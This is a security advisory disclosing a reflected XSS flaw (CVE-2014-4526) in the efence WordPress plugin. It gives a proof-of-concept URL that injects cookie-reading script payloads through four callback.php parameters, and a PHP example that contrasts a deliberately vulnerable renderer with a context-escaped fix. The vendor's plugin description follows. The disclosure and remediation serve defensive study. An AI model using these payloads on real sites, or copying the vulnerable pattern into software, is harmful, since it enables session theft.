wp-plugin : efence – A3-Cross-Site Scripting (XSS)

 

Plugin Details

Plugin Name : efence

Affected Version : 1.3.2 (and most probably lower versions, if any)

Vulnerability : A3-Cross-Site Scripting (XSS)

Identified by : Prajal Kulkarni

Technical Details

Minimum Level of Access Required : Unauthenticated

PoC - (Proof of Concept) :

The PoC below passes the GET parameters message, zoneid, pubKey and privKey of callback.php, each carrying a script payload; the values are reflected into the response without escaping.
http://localhost/wordpress/wp-content/wp-plugs/efence/callback.php?message=message%22%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&zoneid=zoneid%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&pubKey=pubKey%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&privKey=privKey%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
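The reflection pattern the PoC exercises, shown beside a context-aware fix, as an added example. This is not the efence plugin's code: the handler bodies, the helper names (render_callback_vulnerable, render_callback_hardened, esc_attr_ctx, esc_js_ctx, injected_script_count) and the constructed input are assumptions made for illustration. Plain PHP escaping is used so the script runs outside WordPress; inside a plugin, esc_attr() is the WordPress equivalent for the attribute context.

```php
<?php
// Added example, not the efence plugin's own callback.php. The handler bodies
// below are assumed to illustrate the reflection the advisory's PoC shows.

// Vulnerable pattern (assumed): GET parameters are concatenated straight into
// a single-quoted HTML attribute and into a double-quoted inline <script> string,
// matching the %27> and %22</script> breakouts in the PoC URL.
function render_callback_vulnerable(array $get): string {
    $message = (string)($get['message'] ?? '');
    $zoneid  = (string)($get['zoneid'] ?? '');
    return '<div id="efence" data-zone=\'' . $zoneid . '\'></div>' . "\n"
         . '<script>var efenceMessage = "' . $message . '";</script>' . "\n";
}

// Hardened version: escape per output context.
//  - HTML attribute context: htmlspecialchars with ENT_QUOTES so both ' and "
//    are encoded and the attribute cannot be closed early.
//  - JavaScript string context: json_encode with the JSON_HEX_* flags so <, >,
//    &, ' and " become \uXXXX escapes and "</script>" cannot end the block.
function esc_attr_ctx(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function esc_js_ctx(string $s): string {
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

function render_callback_hardened(array $get): string {
    $message = (string)($get['message'] ?? '');
    $zoneid  = (string)($get['zoneid'] ?? '');
    return '<div id="efence" data-zone=\'' . esc_attr_ctx($zoneid) . '\'></div>' . "\n"
         . '<script>var efenceMessage = ' . esc_js_ctx($message) . ';</script>' . "\n";
}

// Regression check a maintainer can keep in a test suite: count <script> tags
// in the rendered output beyond the single one the template itself emits.
function injected_script_count(string $html): int {
    return substr_count(strtolower($html), '<script>') - 1;
}

// Constructed input: the URL-decoded message and zoneid values from the PoC.
$constructed_get = [
    'message' => 'message"</script><script>alert(document.cookie)</script>',
    'zoneid'  => "zoneid'><script>alert(document.cookie)</script>",
];

echo "--- vulnerable ---\n", render_callback_vulnerable($constructed_get);
echo "--- hardened ---\n",  render_callback_hardened($constructed_get);
echo "injected scripts (vulnerable): ", injected_script_count(render_callback_vulnerable($constructed_get)), "\n";
echo "injected scripts (hardened):   ", injected_script_count(render_callback_hardened($constructed_get)), "\n";
```

The point the two renderers make is that one escaping function does not cover both contexts: attribute escaping alone still leaves the `"</script>` breakout in the inline script, and JSON encoding alone does nothing for the attribute. Each reflected value needs the escaper for the context it lands in.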

 

 

Disclosure Timeline

Vendor Contacted : 2014-01-21

Plugin Status : Closed

Public Disclosure : May 28, 2014

CVE Number : CVE-2014-4526

Plugin Description :

efence can do the following for you:

1. **Protection against spam and malicious bots that can harm your web resources**: efence is an alternative to CAPTCHA which protects your website against spam and makes it fun for the user to solve challenges. It presents an interactive picture-based challenge for the users, giving them a break from typing those boring twisted characters. It brings in the fun factor while avoiding the serious spam. Moreover, it's an ideal spam protection tool for handheld devices. Just ask your users what they like doing on their mobile or tablet: typing those twisted characters, or just touch, tap and slide. The answer would be exactly what efence offers.

2. **Guaranteed user engagement with your valued digital advertising and marketing materials**: In the case of a traditional CAPTCHA, when the user fights with those ugly-looking twisted monsters, all that precious time and attention gets wasted with no benefit at all. efence empowers you to capitalize on this precious time and effort. What do you get? Dedicated eyeballs, guaranteed user engagement. This is done by providing great control and flexibility in creating your own branding images for guaranteed engagement. To place your branding images for free, please contact us at support@engageclick.com

This is an official efence plugin which lets you embed efence at the most critical places on your website without editing any files. It takes only a few minutes to install and configure the plugin, in order to unleash the immense power of efence.

= Significant features =

* Receive guaranteed attention to your in-house or external digital marketing contents
* Spam protection by an innovative "Captcha" alternative
* Places a customizable spam protection mechanism on your site - customize colors, shape, size and other attributes.
* Audio aid for visually impaired
* Category based customizable challenge options.
* Customer engagement using your own branding images.
* Powerful analytics to understand customer behavior.
* Works in all the browsers (including IE6!).
* Secure channel option for information security.
* Non-blocking, high-performance code.


Sign up for efence - [efence.engageclick.com](http://efence.engageclick.com)

Take an online demo to get an idea of how efence works as a powerful Captcha alternative ensuring customer engagement.

= Go Premium =

If you have custom requirements and need a support package, we have a dedicated, awesome team that delivers quality customization and support. [Visit official plugin homepage](http://efence.engageclick.com/selfservice-2/plugin/wordpress).
